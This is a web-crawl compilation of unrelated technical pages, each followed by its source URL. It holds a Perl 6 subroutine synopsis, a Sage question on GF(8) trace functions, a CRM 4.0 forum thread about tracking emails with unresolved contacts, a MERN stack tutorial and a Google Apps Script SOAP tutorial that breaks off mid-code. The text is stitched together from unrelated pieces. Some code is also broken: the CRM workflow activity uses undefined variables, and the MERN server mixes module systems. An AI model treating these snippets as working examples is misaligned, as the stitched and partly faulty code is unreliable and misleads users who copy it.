Dataset columns:
- text: string, lengths 454 to 608k
- url: string, lengths 17 to 896
- dump: string, 91 classes
- source: string, 1 class
- word_count: int64, 101 to 114k
- flesch_reading_ease: float64, 50 to 104
Recipes for unit tests when working with date and time in React/JavaScript

In one of our last major projects at my company, we had to deal with real-time flight data, which meant processing and calculating with a lot of date and time values. Tests helped, as always, to keep everything running smoothly and precisely. Now, in the aftermath, I want to show you what helped us write meaningful unit tests.

Tools

- jest is a beautiful test framework for JavaScript
- testing-library/react and testing-library/react-hooks for all the React things
- mockdate to, yes, mock the date

These tools help you, but it is also important to bring a proper mindset when testing date and time.

Mindset

- Handle only one format in your application. It doesn't really matter whether you decide to work with JavaScript Date objects (the value of new Date()) or the static method Date.now(), which returns the number of milliseconds elapsed since January 1, 1970 00:00:00 UTC. Just stick to one and re-format when needed (with date-fns, since moment stopped service).
- Always stub or mock real date and time functions. Never rely on any system time; this will get you into trouble, I promise.

Examples

Mock the date

No matter what you want to test, mock before you start. With jest, it often makes sense to use the beforeEach/All and afterEach/All hooks.

```javascript
import mockdate from "mockdate"

const mockDateInit = 1580782960 // 2020-02-04T02:22:40

describe("yourTest", () => {
  beforeEach(() => {
    mockdate.set(mockDateInit)
  })

  afterAll(() => {
    mockdate.reset()
  })
})
```

As said before, we use mockdate here, which will from now on always return mockDateInit for a new Date() call.

Sorting

If you now want to sort by date or time, let's say make groups of future or past dates, this is fairly easy. Just remember you are now in the time of mockDateInit. You can enhance the previous setup like this:

```javascript
const anyOtherDate = 1580782970

it("should be in the future", () => {
  const result = anyOtherDate > mockDateInit
  expect(result).toBeTruthy()
})
```

Of course, any other calculation-based tasks can be tested the same way.

Timelapse

Sometimes you want to test a timelapse. Let's say you want to check a state now and any changes over the next 5 minutes, like the flight data we processed. Since you don't really want to wait 5 minutes while your tests are running (and sincerely, neither do your co-workers or CI), Jest's timer mocks with their advanceTimersByTime method are here to help.

Here is a unit test that utilizes @testing-library/react-hooks and a useCurrentTime hook, which internally updates every full minute.

```javascript
const mockDateInit = 1580782960            // 2020-02-04T02:22:40
const mockDateNextFullMinute = 1580782980  // 2020-02-04T02:23:00
const mockDateMinuteAfterNext = 1580783040 // 2020-02-04T02:24:00
const mockDateAfter3Minutes = 1580783100   // 2020-02-04T02:25:00

jest.useFakeTimers() // make sure Jest uses them

it("should update every full minute after first update", () => {
  const { result } = renderHook(() => useCurrentTime())

  mockdate.set(mockDateMinuteAfterNext)
  act(() => jest.advanceTimersByTime(100000))
  expect(result.current).toEqual(Math.floor(mockDateMinuteAfterNext / 1000))

  mockdate.set(mockDateAfter3Minutes)
  act(() => jest.advanceTimersByTime(60000))
  expect(result.current).toEqual(Math.floor(mockDateAfter3Minutes / 1000))
})
```

As you can see: we test, and then update mockdate so it returns the new date mock on the next iteration.

Wrap it up

I hope that gave you some ideas for when you write unit tests for a JavaScript app that uses date- and time-relevant data. If you have a relevant use case and don't know how to test it, leave a comment!
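A footnote that is not from the article: if pulling in mockdate is not an option, the same freeze-the-clock effect can be sketched in plain JavaScript by swapping out Date.now and restoring it afterwards. The epoch value is the one the article uses; everything else in this sketch is illustrative:

```javascript
// Freeze "now" without a library: save Date.now, replace it, restore it.
// Note the value is in *milliseconds*, which is what Date.now returns.
const realNow = Date.now;
const mockNowMs = 1580782960 * 1000; // 2020-02-04T02:22:40Z

Date.now = () => mockNowMs; // every caller now sees the frozen time

const fiveMinutesLater = mockNowMs + 5 * 60 * 1000;
console.log(fiveMinutesLater > Date.now()); // true: sorts as "future"

Date.now = realNow; // always restore, like mockdate.reset()
```

The restore step matters: leaving Date.now patched leaks the mock into every later test, which is exactly why the article puts mockdate.reset() in an afterAll hook.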
https://thomasrutzer.medium.com/recipes-for-unit-tests-when-working-with-date-and-time-in-react-javascript-cbd1ad2ef9e5
CC-MAIN-2022-33
refinedweb
586
65.12
Hi, I have 2 questions:

1) I know the vector class in the STL, but I want to make a multi-dimensional array whose length grows as the user enters parameters. How can I do this with "pure C"? Is a linked list the only way, or are there other ways?

2) In C++ I try the following, and it gives an error:

```cpp
#include <iostream>
using namespace std;

int main()
{
    int x, y;
    cout << "first number";
    cin >> x;
    cout << "second number";
    cin >> y;
    int * a[][] = new int[x][y]; // this line gives the error
    delete[] a;
    return 0;
}
```

How can I declare a multi-dimensional array with new in C++? Thanks.
http://cboard.cprogramming.com/cplusplus-programming/78986-multi-dimensional-array-runtime-printable-thread.html
CC-MAIN-2013-48
refinedweb
101
76.93
0

Having worked with txt files, I'm learning about binary now. My code below works for a while, then bombs out. Can you point me towards a method or module to read binary data line by line? The Crypto module requires a buffer (I don't know how to create one of those) or a string.

```python
import os
from Crypto.Cipher import AES

USEFILE = 'picture.bmp'

class encryptData():
    def __init__(self, file):
        blockSize = 32
        self.file = file
        secretKey = os.urandom(blockSize)
        self.dataFile = open(file, "rb")
        cipher = AES.new(secretKey, AES.MODE_CFB)
        if self.dataFile:
            newFile = self.dataFile.readlines()
            for lines in newFile:
                print cipher.encrypt(lines)
            print secretKey

run = encryptData(USEFILE)
```

I'm looking to read a binary file and encrypt it. Many thx.
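An observation not from the original post: readlines() splits binary data at whatever 0x0A bytes happen to occur, so the "lines" have arbitrary lengths, which is a poor fit for a block cipher. The usual fix is to read the file in fixed-size chunks. Below is a stdlib-only sketch of that pattern in Python 3 (unlike the Python 2 code above), with XOR standing in for the real cipher so it runs without PyCrypto:

```python
import io

BLOCK = 16  # AES block size in bytes

def encrypt_chunks(stream, key):
    """Read a binary stream in fixed-size chunks and 'encrypt' each one.

    XOR with a one-byte key is only a stand-in: with PyCrypto you would
    call cipher.encrypt(chunk) here instead (padding the final chunk).
    """
    out = bytearray()
    # iter(callable, sentinel) keeps calling read(BLOCK) until it returns b""
    for chunk in iter(lambda: stream.read(BLOCK), b""):
        out.extend(b ^ key[0] for b in chunk)
    return bytes(out)

data = bytes(range(40))  # pretend binary file contents
enc = encrypt_chunks(io.BytesIO(data), b"\x55")
dec = encrypt_chunks(io.BytesIO(enc), b"\x55")  # XOR is its own inverse
print(dec == data)  # True
```

With a real file you would pass `open(USEFILE, "rb")` instead of the BytesIO object; the chunking loop is identical.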
https://www.daniweb.com/programming/software-development/threads/234677/encrypting-binary-data-with-aes-crashes
CC-MAIN-2016-50
refinedweb
123
70.39
This article assumes you are familiar with declaring and using managed types and the .NET Garbage Collector.

Creating your first web service is incredibly easy if you use C# or VB.NET (see my previous article for details). Writing a WebService using managed C++ in .NET is also extremely simple, but there are a couple of 'gotcha's that can cause a few frustrating moments.

My first suggestion is to use the Visual Studio .NET wizards to create your WebService (in fact, it's a great idea for all your apps when you are first starting out). This is especially important if you are moving up through the various builds of the beta bits of .NET. What is perfectly acceptable in one build may fail to compile in another, and it may be difficult to work out which piece of the puzzle you are missing.

Using the wizards can get a managed C++ WebService up and running in minutes, but things can start to get a little weird as soon as you try something a little more risqué. For this example I have created a service called MyCPPService by using the wizard. Simply select File | New Project and run through the wizard to create a C++ WebService.

A new namespace will be defined called CPPWebService, and within this namespace will be the classes and structures that implement your webservice. For this example I have called the class MyService. Other files created by the wizard include the .asmx file that acts as a proxy for your service, the config.web file for configuration settings, and the .disco file for service discovery. Once you compile the class, your assembly will be stored as CPPWebService.dll in the /bin directory.

I wanted to mimic the C# WebService created in my previous article, but with a few minor changes to illustrate using value and reference types.
With this in mind, I defined a value type structure ClientData and a managed reference type ClientInfo within the namespace, both containing a name and an ID (String* and int values respectively):

```cpp
__value public struct ClientData
{
    String *Name;
    int ID;
};

__gc public class ClientInfo
{
    String *Name;
    int ID;
};
```

In order to return an array of objects, a quick typedef is also declared:

```cpp
typedef ClientData ClientArray[];
```

In a similar fashion I defined my MyService class as a simple managed C++ class with three methods: MyMethod, which simply returns a number; GetClientData, which returns a single ClientData value; and GetClientsData, which returns an array of them.

```cpp
// CPPWebService.h
#pragma once
#using "System.EnterpriseServices.dll"

namespace CPPWebService
{
    __value public struct ClientData
    {
        String *Name;
        int ID;
    };

    __gc public class ClientInfo
    {
        String *Name;
        int ID;
    };

    typedef ClientData ClientArray[];

    __gc class MyService
    {
    public:
        [WebMethod] int MyMethod();
        [WebMethod] ClientData GetClientData();
        [WebMethod] ClientArray GetClientsData(int Number);
    };
}
```

The important thing to notice about the function prototypes is the [WebMethod] attribute: it informs the compiler that the method will be a method of a web service, and that it should provide the appropriate support and plumbing. The method you attach this attribute to must also be publicly accessible.

The implementation (.cpp) file is as follows.
```cpp
#include "stdafx.h"

#using <mscorlib.dll>
#using "System.Web.dll"
#using "System.Web.Services.dll"

using namespace System;
using namespace System::Web;
using namespace System::Web::Services;

#include "CPPWebService.h"

namespace CPPWebService
{
    int MyService::MyMethod()
    {
        return 42;
    }

    ClientData MyService::GetClientData()
    {
        ClientData data;
        data.Name = new String("Client Name");
        data.ID = 1;
        return data;
    }

    ClientArray MyService::GetClientsData(int Number)
    {
        // simple sanity checks
        if (Number < 0 || Number > 10)
            return 0;

        ClientArray data = new ClientData __gc[Number];

        if (Number > 0 && Number <= 10)
        {
            for (int i = 0; i < Number; i++)
            {
                data[i].Name = new String("Client ");
                data[i].Name->Concat(i.ToString());
                data[i].ID = i;
            }
        }
        return data;
    }
};
```

Note the use of the syntax i.ToString(). In .NET, value types such as ints and enums can have methods associated with them; i.ToString() simply calls Int32::ToString() for the variable i.

One huge improvement of .NET beta 2 over beta 1 is that you no longer need to mess around with the XmlIncludeAttribute class to inform the serializer about your structure. A few bugs that either caused things to misbehave, or worse, not run at all, have also been fixed. Writing a WebService in MC++ is now just as easy as it is in C#, with the advantage that you can mix and match native and managed code while retaining the raw power of C++.

Once you have the changes in place, you can build the project, then test the service by right-clicking on CPPWebService.asmx in the Solution Explorer in Visual Studio and choosing "View in Browser". The test page is shown below. Clicking on one of the methods (say, GetClientsData) results in a proxy page being presented which allows you to invoke the method directly from your browser. The GetClientsData method takes a single int parameter which you can enter in the edit box.
When invoked, this returns the following:

Writing WebServices using Visual C++ with managed extensions is just as easy as writing them using C# or VB.NET, as long as you remember a few simple things: use attributes, declare your classes as managed, and make them publicly accessible. Using the Visual Studio .NET wizards makes writing and deploying these services a point-and-click affair, but even if you wish to do it by hand, the steps involved are extremely simple.

Oct 18 - updated for .NET beta 2

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

```cpp
struct MatchingPatientData
{
    BSTR PatientId;
    BSTR FirstName;
    BSTR LastName;
};

HRESULT QueryPatientsSimple
(
    MatchingPatientData** QueryPatientsSimpleResult,
    int* QueryPatientsSimpleResult_nSizeIs
);
```
https://www.codeproject.com/Articles/1043/Your-first-managed-C-Web-Service?msg=1014467
CC-MAIN-2017-43
refinedweb
992
54.32
Adding a MODATA_COLOR array in my object

On 15/11/2013 at 04:06, xxxxxxxx wrote:

Hi, I have the following code in a Python Effector (Full), and the function md.SetArray(c4d.MODATA_COLOR, clrs, True) doesn't seem to set my new colors in the array. Printing md.GetArray(c4d.MODATA_COLOR) gives None, so I suppose my object is missing this MODATA_COLOR array. md.SetArray(c4d.MODATA_MATRIX, marr, True) is working OK, so MODATA_MATRIX is present. How can I add the MODATA_COLOR array to my md object? I've tried md.AddArray(40000001) and different possibilities, but it doesn't seem to work. Any idea? Thanks.

Screenshot:

```python
import c4d
from c4d.modules import mograph as mo
from random import randint

# Welcome to the world of Python

def randomColor():
    r = randint(0, 255) / 256.0
    g = randint(0, 255) / 256.0
    b = randint(0, 255) / 256.0
    color = c4d.Vector(r*4, g*10, b*20)
    return color

def main():
    md = mo.GeGetMoData(op)
    if md == None:
        return False

    cnt = md.GetCount()
    marr = md.GetArray(c4d.MODATA_MATRIX)
    uvw = md.GetArray(c4d.MODATA_UVW)
    print uvw
    fall = md.GetFalloffs()

    for i in reversed(xrange(0, cnt)):
        marr[i].off = marr[i].off + fall[i]*100.0
    print marr

    clrs = md.GetArray(c4d.MODATA_COLOR)
    print clrs

    clrs = []
    for x in reversed(xrange(0, cnt)):
        clrs.append(randomColor())
    print clrs

    print '_____'
    print md.GetCurrentIndex()
    print md.GetArrayDescID(0)
    print md.GetArrayIndex(40000000)
    print md.GetArrayID(md.GetArrayIndex(40000004))
    print md.GetName(0)
    print md.GetIndexName(0)
    print '_____'

    #print md.AddArray(40000001)
    md.SetArray(c4d.MODATA_MATRIX, marr, True)
    md.SetArray(c4d.MODATA_COLOR, clrs, True)
    print md.GetArray(c4d.MODATA_COLOR)
    return True
```

On 15/11/2013 at 07:48, xxxxxxxx wrote:

@admin: how should one use "square brackets" here? [ i ] EDIT: mmm, appears to work.

On 15/11/2013 at 19:01, xxxxxxxx wrote:

You've got some errors in your for loop. Try it like this:

```python
for i in reversed(xrange(0, cnt)):
    marr[i].off = marr[i].off + fall[0]*100
```

-ScottA

On 16/11/2013 at 02:44, xxxxxxxx wrote:

Thanks, Scott. But I don't want to change the position in my object, I want to change the colors. So I've tried to take the colors from the object with md.GetArray(c4d.MODATA_COLOR), but it gives me None. Then I thought to apply the array to the md object with SetArray(..., my_array_of_clrs, True), but no array seems to be added. Then I saw another function there, md.AddArray(...), but I'm not sure how to use it to push my array into the MoData object. Any idea?

On 16/11/2013 at 06:47, xxxxxxxx wrote:

I might sound grumpy, but I am not willing anymore to read such messy code. However, here is an example of how to write the color channel for MoData particles (including some random noise for the position).

```python
import c4d
from c4d.utils import noise
from c4d.modules import mograph as mo

def getNoiseVector(p, uniform=False, negative=True):
    """
    :param p: input vector
    :param uniform: greyscale vector
    :param negative: include negative values
    :return: c4d.Vector
    """
    if uniform and negative:
        n = noise.SNoise(p)
        return c4d.Vector(n, n, n)
    elif uniform:
        n = noise.Noise(p)
        return c4d.Vector(n, n, n)
    elif negative:
        return c4d.Vector(noise.SNoise(c4d.Vector(p.x, p.y, p.z)),
                          noise.SNoise(c4d.Vector(p.z, p.x, p.y)),
                          noise.SNoise(c4d.Vector(p.y, p.z, p.x)))
    else:
        return c4d.Vector(noise.Noise(c4d.Vector(p.x, p.y, p.z)),
                          noise.Noise(c4d.Vector(p.z, p.x, p.y)),
                          noise.Noise(c4d.Vector(p.y, p.z, p.x)))

def main():
    md = mo.GeGetMoData(op)
    if md == None:
        return False

    # writing the matrices array with some position noise
    cnt = md.GetCount()
    marr = md.GetArray(c4d.MODATA_MATRIX)
    for i in reversed(xrange(0, cnt)):
        marr[i].off = getNoiseVector(c4d.Vector(i, 0, 0)) * 200

    # writing the color array with some color noise
    carr = md.GetArray(c4d.MODATA_COLOR)
    for i in reversed(xrange(0, cnt)):
        carr[i] = getNoiseVector(c4d.Vector(i, 0, 0), False, False)

    # write our data back
    md.SetArray(c4d.MODATA_COLOR, carr, False)
    md.SetArray(c4d.MODATA_MATRIX, marr, False)
    return True
```

The result will look something like this:

On 16/11/2013 at 11:08, xxxxxxxx wrote:

Hi, littledavid. First: my code doesn't look good, I admit. But it is the first code I am trying in C4D :). So, apologies. Second: your code may be beautiful, but it gives me the same error, TypeError: 'NoneType' object does not support item assignment, on the line carr[i] = getNoiseVector(c4d.Vector(i,0,0), False, False). So my problem is that I can't assign into that carr in my specific object (it's a Voxygen object). So I've tried AddArray, but I don't know how to use it. Any idea? Thanks for your effort :)

On 16/11/2013 at 11:24, xxxxxxxx wrote:

What is a Voxygen object? Is it that voxelizer addon by Paul Everett? I suppose it does act as a MoGraph generator. When carr = md.GetArray(c4d.MODATA_COLOR) is None for that object, there has to be an inconsistency with that plugin, I guess, as the definition of MoData.GetArray(id) is: "Get an array. Parameters: id (int) – The ID of the array." The possible flags are:

- MOGENFLAG_CLONE_ON: Particle is visible.
- MOGENFLAG_DISABLE: Particle is permanently disabled.
- MOGENFLAG_BORN: Particle is just generated (internal use only).
- MOGENFLAG_MODATASET: The MoData has been set and doesn't need the input of the transform panel.
- MOGENFLAG_COLORSET: The MoData color has been set and doesn't need to be updated.
- MOGENFLAG_TIMESET: The MoData time has been set and doesn't need to be updated.

So you are guaranteed to get a list. It is a bit difficult to solve your problem without that plugin.

On 16/11/2013 at 11:32, xxxxxxxx wrote:

Yeah, this was also my first idea: bad design in the plugin :). You are right, it is the Voxelizer (a MoGraph generator, like Random). So it's not my fault that I don't know how to use the C4D API, but a plugin problem. Anyway, I'll try to add that bloody array in some way... :)

On 16/11/2013 at 11:46, xxxxxxxx wrote:

Well, as I said, normally you are guaranteed to find the default arrays (even if they are bugged and empty like the size array). You can try to add the array manually, but I doubt that it will work (as you do expect the color to be processed in the viewport). The DescID for the color array would be (40000001, 3, 0):

```python
md.AddArray(c4d.DescID(c4d.DescLevel(40000001), c4d.DescLevel(3), c4d.DescLevel(0)))
```

edit: FYI, I wouldn't call it bad design in the plugin, as Paul Everett is also one of the authors of MoGraph, so he most likely knows what he's doing. It is more a documentation problem.
https://plugincafe.maxon.net/topic/7545/9449_adding-a-modatacolor-array-in-my-object
CC-MAIN-2020-50
refinedweb
1,177
61.63
Unused templates

From ArchWiki

This page lists all pages in the Template namespace that are not included in another page. Remember to check for other links to the templates before deleting them.

Showing below up to 8 results in range #1 to #8.

- Template:AR
- Template:Game new
- Template:Games start new
- Template:I18n
- Template:Note (Español)
- Template:Related articles start (العربية)
- Template:Tip (正體中文)
- Template:Warning (正體中文)
https://wiki.archlinux.org/index.php?title=Special:UnusedTemplates&limit=250&offset=0
CC-MAIN-2017-17
refinedweb
104
55.58
#include <c4d_canimation.h>

- Gets the number of keys in the curve.
- Gets the const key at index in the curve.
- Gets the key at index in the curve.
- Finds the const key at the given time.
- Finds the key at the given time.
- Adds a key to the curve.
- Adds a key to the curve but retains the curve's current curvature.
- Inserts a key into the curve.
- Deletes a key from the curve.
- Moves a key in the curve.
- Removes all keys from the curve.
- Calculates the Hermite spline between two sets of key values.
- Calculates the soft tangents (i.e. auto interpolation) around a key.
- Computes the tangents of a key, taking into account all options like zero slope, link slope etc.
- Gets the value calculated at time, taking into account things like time curves.
- Gets the track of the curve.
- Sets the defaults for key kidx of the curve. This includes lock, mute, clamp, break, auto properties, interpolation and tangents. This sets up a value and completes the missing properties with the defaults.
- Sets keys dirty. Private.
- Gets the start time of the curve.
- Gets the end time of the curve.
- Finds the next unmuted key (read-only).
- Finds the next unmuted key (writable).
- Finds the previous unmuted key (read-only).
- Finds the previous unmuted key (writable).
https://developers.maxon.net/docs/Cinema4DCPPSDK/html/class_c_curve.html
CC-MAIN-2021-17
refinedweb
219
80.38
Difference between revisions of "Simrel/Contributing to Simrel Aggregation Build"

Revision as of 16:22, 29 October 2016

Contents
- 1 Get the simrel.build project
- 2 Configuration
- 3 Edit the aggregation description and models
- 4 The best format and process for contributing to Sim. Release
- 5 Pushing your changes

These instructions outline how to contribute to the aggregation build for the common repository. They were substantially changed in August 2012 to accommodate the migration to a new source repository and, at the same time, a rename of the main project needed from that repository. The instructions and process for Juno (SR1 and SR2) are very similar to those for Kepler (SR0, in June 2013), except for the branch to use for modifications/updates: Juno_maintenance for the former, master for the latter. For the history of the migration and change of project names, see bug 359240. These instructions were also updated when moving to Gerrit, as discussed in bug 422215; those changes are backward-compatible, so there are also relevant maintenance branches of the aggregator.

If at any time there are questions, issues or problems, don't hesitate to ask on the cross-project list, or open a cross-project bug.

Get the simrel.build project

If you don't have it already, you'll need to install Eclipse EGit (from the common repository or its own repository) and the CBI Aggregator Editor (previously called the "b3 aggregator").

- To be most current, it is best to use Eclipse 4.5 (Mars) and the latest 1.0.x version of the CBI Aggregator Editor, installed from CBI's Aggregator "4.5 repo".
- Note: As far as is known, any EPP package (or plain Eclipse Platform) should work, but you will (naturally) also need EGit installed to work with *.b3aggrcon files, so the Eclipse "Standard" EPP package is a good choice to start with.
- For more detail, see the instructions to install the CBI Aggregator Editor (and get the above mentioned project in your workspace).
- Open the file simrel.b3aggr using the Aggregator Model Editor.

Configure the workspace

[This section was originally copied from Platform-releng/Git_Workflows#Configure_the_workspace and then modified.]

On the General > Workspace preference page, set "New text file line delimiter" to Unix.

Configuring the repo

[This section was originally copied from Platform-releng/Git_Workflows#Configuring_the_repo.]

Configuring the workspace content types

By default, the b3aggr and b3aggrcon file types will not be recognized by Eclipse and thus will be treated as "binary" files. This, for example, will prevent you from using the "Convert Line Endings" function on these files. Because of several issues with Git, EGit, and mixed line endings, we follow the convention of trying to always have only "LF" in the repository version of the files. It is strongly recommended to have only the "LF" version of the file in your workspace too. But in some cases (due to mistakes or your own settings) you may have to "manually" change the CRLF back to LF and then commit and push those changes.

One way to enable these file types to be seen as text files is to go into the content type preferences and associate *.b3aggr and *.b3aggrcon files with the content type "XML". After doing this you may have to go back into "associated editors" and reset the CBI Aggregator Editor to be the default editor for *.b3aggr files (or else the XML editor will be the default, and you really should not edit that file with the XML editor, except in very specialized circumstances).

Edit the aggregation description and models

For new project contributions

Create the following elements (New Child) under the top "Aggregation:" node or "Validation set:":

- One or more Contacts (show the Property View to specify both Email and Name). [It must be a real email, not a dev list.]
- A Contribution (specify Label and link to Contact)
- A Mapped Repository (specify Location: the URL of your p2 repository)
- Your Features (select the name from the features found in your repository, select Categories from the pre-defined set, specify the exact version to be included in the aggregation under Version Range)
- To create your b3aggrcon file, select your specific Contribution. Be sure to "pull" first, to be sure you have the current contents of everything (with no conflicts).

To ensure that your contribution will not break the build, right-click on the top-most "Aggregation:" node and

- Validate checks the general XML and EMF model validity (short running), then
- Validate Aggregation checks that the whole model specifies correct and valid repo locations and compatible dependencies (long running).
- Commit and Push. At this point, you are ready to commit and push your contribution. You will need to check in changes to the simrel.b3aggr file, as well as your <projectname>.b3aggrcon file.

Updating contributions

- To change things like Contributors (contacts), Categories, or Features (adding or removing), you should use the Aggregator Editor with the top-level simrel.b3aggr file, which will modify your project's .b3aggrcon file as well.
- Now use the context menu > Validate on your Contribution and make sure the validation completes successfully, with no errors flagged with red X's.
- When done, commit the simrel.b3aggr file as well as your project's .b3aggrcon file. (Note that other .b3aggrcon files may have been re-generated, possibly simply re-ordering attributes or changing whitespace. You can ignore these.)
- To change values of feature versions, or repository URLs, you can directly change your projectname.b3aggrcon file with a text editor (or build scripts) and check those in, in isolation. Of course, you can and should still use the Aggregator Model Editor, and it is often desirable to do so, as it will do a "validate aggregation" and will tell you if something is wrong.
For example, if there is a typo and the repository URL does not point to a valid repository, you'll know about it right away if you use the Aggregator Model Editor.

Categories

The overall categories used in the common repository are the responsibility of the Planning Council (in that they have the final say about any new ones, removals, etc.). So please open a cross-project bug if you'd like to propose new categories or some reorganization. But otherwise, feel free to add or remove your features from whatever categories you think are appropriate (using the full aggregator editor, since two files are changed when doing so), and others will open bugs if something seems wrong, or in the wrong category.

Runtime Target Platform Category

Some features (or bundles) are not intended to be installed into an IDE; they do not contribute to the IDE (such as menu items, etc.). By convention, such features should be placed in the "EclipseRT Target Platform Category". This would be the case for, say, a "server" that someone was coding and testing for. In some cases, a runtime feature might "cause harm" (or change behavior) if a user mistakenly installed it into their IDE. To prevent a feature (or bundle) from being installed into an IDE, the current "process" is for that feature or bundle to specify a negative requirement on a "magic IU". This is usually done in a p2.inf file, with contents of:

```
# this bundle should not be installed into IDE
requires.0.namespace = A.PDE.Target.Platform
requires.0.name = Cannot be installed into the IDE
requires.0.range = 0.0.0
```

The details of the "magic" solution may change in Juno, as a cleaner solution is being discussed in bug 365004; it would be a similar "negative requirement", but just may be on a different (non-magic) IU.

The best format and process for contributing to Sim. Release

The best format to use is a simple repo, with exact versions specified in your b3aggrcon file. That is, editing the b3aggrcon file should be the last step in the process.
Pushing your changes

If you do not have write access to this repository location, open a bugzilla entry or send an email to the webmaster, explaining which project you are working with, and CC the Planning Council chairperson (currently david_williams@us.ibm.com). (Note: to control "inactive committers", once per year, usually around SR1, ...)

Then you can push your commit directly to the target branch on the remote repo (i.e., if you want to update the next release, push directly to master; if you want to update the Kepler release, push to the Kepler_maintenance branch; and so on...)
http://wiki.eclipse.org/index.php?title=Simrel/Contributing_to_Simrel_Aggregation_Build&diff=next&oldid=411163
CC-MAIN-2020-16
refinedweb
1,374
52.7
Does Python's time.time() return the local or UTC timestamp?

Answer: The time.time() function returns the number of seconds since ...READ MORE

Related answers on this forum:

- You can use the following code block: x=range(1,100); len(x) Output: ...READ MORE
- Use this: import os; os.path.exists(path) # Returns whether the ...READ MORE
- print(datetime.datetime.today()) READ MORE
- suppose you have a string with a ...READ MORE
- if you google it you can find ...READ MORE
- Syntax: list.count(value) Code: colors = ['red', 'green', ...READ MORE
- The print() function is used to write ...READ MORE
- The print() is getting called multiple times ...READ MORE
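To make the point concrete (this example is not from the thread): time.time() returns seconds since the Unix epoch, 1970-01-01 00:00:00 UTC, no matter what the local timezone is; the timezone only enters when you format the number into a calendar date:

```python
import time
from datetime import datetime, timezone

t = time.time()  # float seconds since 1970-01-01T00:00:00 UTC

# Interpreting the same number as UTC reproduces the current UTC clock;
# the local timezone never changes the value of t itself.
utc_dt = datetime.fromtimestamp(t, tz=timezone.utc)
drift = abs((datetime.now(timezone.utc) - utc_dt).total_seconds())
print(drift < 5)  # True
```

By contrast, datetime.fromtimestamp(t) with no tz argument renders the same instant in the local zone; the underlying timestamp is identical either way.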
https://www.edureka.co/community/24208/does-python-s-time-time-return-the-local-or-utc-timestamp
CC-MAIN-2020-10
refinedweb
112
81.49
MyConfig.configure() not getting called.

Hi guys, trying a simple hello world to get a feel for RL2 today. Feels very different from RL1, so I'm a little lost. I'm not getting a trace from HelloConfig.configure. What gives?

Main class:

```actionscript
package {
    import flash.display.Sprite;

    public class RL_Hello extends Sprite {
        private var _app:HelloApp;

        public function RL_Hello() {
            trace("RL_Hello");
            _app = new HelloApp();
            addChild(_app);
        }
    }
}
```

HelloApp.as:

```actionscript
package {
    import flash.display.Sprite;
    import robotlegs.bender.framework.api.IContext;
    import robotlegs.bender.framework.impl.Context;
    import robotlegs.bender.bundles.mvcs.MVCSBundle;

    public class HelloApp extends Sprite {
        private var _context:IContext;

        public function HelloApp() {
            trace("HelloApp");
            _context = new Context()
                .install(MVCSBundle)
                .configure(HelloConfig, this);
        }
    }
}
```

HelloConfig.as:

```actionscript
package {
    import flash.display.DisplayObjectContainer;
    import robotlegs.bender.extensions.mediatorMap.api.IMediatorMap;
    import robotlegs.bender.framework.api.IConfig;
    import robotlegs.bender.framework.api.IContext;
    import robotlegs.bender.framework.api.LogLevel;

    public class HelloConfig implements IConfig {
        [Inject] public var context:IContext;
        [Inject] public var mediatorMap:IMediatorMap;
        [Inject] public var contextView:DisplayObjectContainer;

        public function configure():void {
            trace("HelloConfig.configure");
            context.logLevel = LogLevel.DEBUG;
            mediatorMap.map(HelloView).toMediator(HelloMediator);
            context.lifecycle.afterInitializing(init);
        }

        private function init():void {
            trace("HelloConfig.init");
            contextView.addChild(new HelloView());
        }
    }
}
```

Support Staff 1 Posted by Ondina D.F. on 16 Nov, 2012 01:37 PM

Hi Joel, I do the configuration like this: MainView.as ApplicationContext.as Does that help?
Ondina Support Staff 2 Posted by Shaun Smith on 16 Nov, 2012 02:34 PM In the latest version you have to supply the view wrapped in a ContextView object. I think I updated all the readmes, but it's possible that I missed some. .configure(new ContextView(this)) Shaun Smith 3 Posted by Joel Stransky on 16 Nov, 2012 05:09 PM Thanks for the example Ondina. It always helps understand intent when I see things used differently. For now I want to address Shaun's comment first and then I'll contemplate a different structure. @Shaun, here's my updated bootstrap: but now I get an injector error. Error: Injector is missing a mapping to handle injection into property "contextView" of object "[object HelloConfig]" with type "HelloConfig". I'm not sure how to handle that mapping. 4 Posted by Joel Stransky on 16 Nov, 2012 05:51 PM I'm borrowing this approach from by the way. Support Staff 5 Posted by Ondina D.F. on 16 Nov, 2012 06:58 PM This works: View _context = new Context() .install(MVCSBundle) .install(ContextViewExtension) .configure(AppConfig) .configure(new ContextView(this)); AppConfig.as [Inject] public var contextView:ContextView; //===contextView type is ContextView !!! ….. private function init():void { // add the view that has the mediator mapped to it contextView.view.addChild(new MessageWriterView()); Support Staff 6 Posted by Shaun Smith on 16 Nov, 2012 07:21 PM Ah yes, I'll need to update those examples. The ContextView is mapped into the injector as ContextView. Inject that and you can access the wrapped view object. It may seem like a bit of a silly change, but mapping a raw DisplayObjectContainer directly into the injector always felt odd and unclear to me. The new way is much more explicit I think. Also, the whole context.configure(this)thing was super unclear. 7 Posted by Joel Stransky on 16 Nov, 2012 07:22 PM Sorry if this triple posted. I'm not seeing this thread update. I thought that the MVCSBundle already installed ContextViewExtension. 
Changing the type to ContextView worked. It seems redundant to have to say contextView.view, though. So now the only problem is, the event I dispatch from my view constructor is not being caught by its mediator.

HelloView.as
HelloMediator.as

8 Posted by Joel Stransky on 16 Nov, 2012 07:32 PM

Ok, got the mediator to catch it but had to move the dispatch to onAddedToStage. I wouldn't normally dispatch within the constructor anyway, but I'm just hacking at the moment to see how the parts work together. Not sure if it means anything, but at first I didn't remove the ADDED_TO_STAGE listener within onAddedToStage as is common, and my event got handled twice in the mediator. Once I added the remove it worked as expected, but I'm curious as to why that happened.

See, this is why I love robotlegs so much. From this extremely basic example, I already feel like I could dive into a large app.

Support Staff
9 Posted by Shaun Smith on 16 Nov, 2012 07:42 PM

Yup, I imagine that your custom event was being fired too soon (a view object must be constructed before it can be parented). Not sure about the double added-to-stage though - that's a weird one.

The ContextViewExtension is indeed installed by the MVCSBundle - its job is to watch the configure() method for a ContextView object and map it into the injector: ... Similarly, the StageSyncExtension inspects ContextView objects and auto-initializes the Context: ...

Support Staff
10 Posted by Ondina D.F. on 20 Nov, 2012 10:14 AM

Joel, this seems to be resolved. If you want to continue this discussion, feel free to reopen it.

Ondina D.F. closed this discussion on 20 Nov, 2012 10:14 AM.
http://robotlegs.tenderapp.com/discussions/robotlegs-2/395-myconfigconfigure-not-getting-called
Synopsis 6
by Damian Conway, Allison Randal
April 09, 2003

Editor's note: this document is out of date and remains here for historic interest. See Synopsis 6 for the current design information.

This document summarizes Apocalypse 6, which covers subroutines and the new type system.

Subroutines and Other Code Objects
